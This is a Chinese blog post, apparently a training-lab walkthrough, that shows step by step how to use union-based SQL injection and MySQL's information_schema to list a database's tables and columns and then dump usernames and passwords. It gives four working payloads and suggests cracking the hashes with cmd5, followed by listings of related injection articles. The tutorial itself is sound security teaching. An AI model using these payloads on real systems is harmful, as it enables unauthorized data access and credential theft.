SQL注入--information_schema注入

最新推荐文章于 2024-07-01 08:45:00 发布
最新推荐文章于 2024-07-01 08:45:00 发布
阅读量433 收藏 3
点赞数 1
分类专栏: it 文章标签: sql 数据库 oracle 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arissa666/article/details/131756170
版权

思路:确定数据库,数据库表名,数据库字段名,在用表名字段名查询到字段值

mysql5.0版本安装之后会有自带的数据库information_schema,存储的是表名和表字段

 先确定注入点数据库名字

1' union select database(),user(),3#%

用数据库名字在查数据库有哪些表,用到tables表里面的table_schema ,table_name两个字段可以被利用

 用联合查询语句补齐注入点,能查到pikachu数据库下面有哪些表名

u' union select table_schema ,table_name,3 from information_schema.tables where table_schema='pikachu'#

 

 上面能看到有pikachu数据库里面有users表,根据表名查询,获取表里的字段名

k' union select table_name,column_name,3 from information_schema.columns where table_name='users'#%

 根据字段名,查询到字段值

zzz'union select username ,password,3 from users#%

 查到的密码用cmd5解密就可以

 

学海无涯一叶扁舟
关注
专栏目录
SQL注入information_schema的作用
weixin_54992237的博客
11-13 1318
实验步骤 information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。 在phpmyadmin中,在左侧点击inform...
information_schema注入
北冥有鱼
03-30 4992
上一篇文章提到过,information_schema是mysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
渗透测试---数据库安全: sql注入数据库原理详解
有勇气的牛排博客
02-12 4211
文章目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3.2.3 group_concat() 函数4 注入4.1 联合查询 union 注入4.2 information_schema 注入5.2.1 获取所有数据库4.2.2 获取指定数据库的表4.2.3 获取指定表的字段名4.2.4 获取字段值得内容4.3 基于报错信息注入4.3.1 三个常用报错函数4.4 数字注入4.5 搜索注入5 sql注入
6.SQL注入-通过information_schema拿下数据库案例
最新发布
愿听风成曲
07-01 368
通过被爆出来的库名pikachu,还有字段username,password,进行编写payload语句进行测试。数据库information_schema数据库中存在很多重要信息,包括所有的表名,库名,列名等等。发现将pikachu库中所有的表都已经暴漏出来,发现有一个users表比较敏感信息,可以利用。根据上面的sql语句进行编写payload进行测试是否可以查出来对应的高级权限的用户和密码。我进行随意输入一个单引号,进行查询,返回报错sql语句错误等,证明输入的信息被后台执行了。
SQL注入中的information_schema
weixin_39514626的博客
05-21 238
SQL注入-----数据库information_schema
Red Rapefruit
02-17 1126
SQL注入information_schema的作用 information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式.什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等.也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息.如数据库名,数据库的表,表栏的数据类型与访问权限等.在INFORMATION_SCHEMA中,有数个只读表. 在SQL注入中,我们重点关注的
information_schema数据库SQL注入中的应用.docx
06-11
本文介绍了information_schema数据库的三张重要的表"schemata"、“tables”和“columns”在SQL注入中的应用思路。
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1483
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1306
information_schema过滤与无列名注入
SQL注入中的一些Information_schema的简介
weixin_51884452的博客
06-04 803
sql注入中一些information_schema简介
Sql注入前置知识之information_schema数据库
BetsyMyGirl的博客
11-30 1410
概述 Mysql5.0以上, Mysql自带了Information_schema这个数据库, 5.0以下是没有的,information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。 实际运用 select table_name from information_
Information_Schema注入
qq_45680080的博客
11-02 337
Information_Schema注入 information_schema简单介绍: 打开MySQL数据库——在第二行mysql>处输入show databases(查看在MySQL上的数据库)——在第二行mysql>输入use information_schema;——进入之后在第四行mysql>输入show tables(查看该数据库的表格)——在第三行mysql>...
sql注入information_schema数据库
qq_43814486的博客
03-31 2947
1.union语句 该语句可以使两个语句联合起来,但是该语句有一个前提,就是union后边跟的字段数必须要和前面对应,也就是说要知道前面的字段个数,然后对应上,这里可以用order by,错误的话会出现类似以下样子,说明没有第四字段。 这时候再试试三: 他就不会有报错,说明有三个字段,所以就可以用 union select 自己想要的东西了,比如user(),database(),versio...
SQL注入--详解information_schema数据库SQL注入中的作用(以dvwa靶场为例)
m0_62959190的博客
01-30 900
上面的pyload意思是从tables表筛选名为dvwa库和table_name字段的表。(COLLATE utf8_general_ci,这个不用管,编码问题)上面的pyload就是从columns表中筛选users表下的列名。常规顺序:爆库名--爆表名--爆列名--拖数据。schemata表存放了所有数据库的名字。tables表存放了数据库中的所有表名。columns表存放了数据库中所有列名。一、schemata表。三、columns表。
SQL注入】mysqlinformation_schema详解
weixin_33826609的博客
10-29 577
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。 0x01SCHEMATA表:提供了当前mysql实例中所有数...
学习SQLINFORMATION_SCHEMA数据库
culuo4781的博客
07-18 885
The best way how to explain what the INFORMATION_SCHEMA database is would be – “This is the database about databases. It’s used to store details of other databases on the server”. What does that...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值